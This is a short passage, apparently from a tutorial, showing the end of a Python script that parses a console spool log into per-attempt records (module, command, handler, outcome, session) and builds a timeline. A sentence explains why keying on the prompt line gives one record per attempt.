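if __name__ == "__main__":
    for r in parse_spool(SPOOL):
        print(r["module"], r["command"], r["handler"], r["outcome"], r["session"])
    print(sessions_timeline(parse_spool(SPOOL)))
```

Because the parser keys on the prompt line, a single spool file covering several modules and targets still yields one record per attempt, which is what a timeline of "what was run against which host, and what came back" needs.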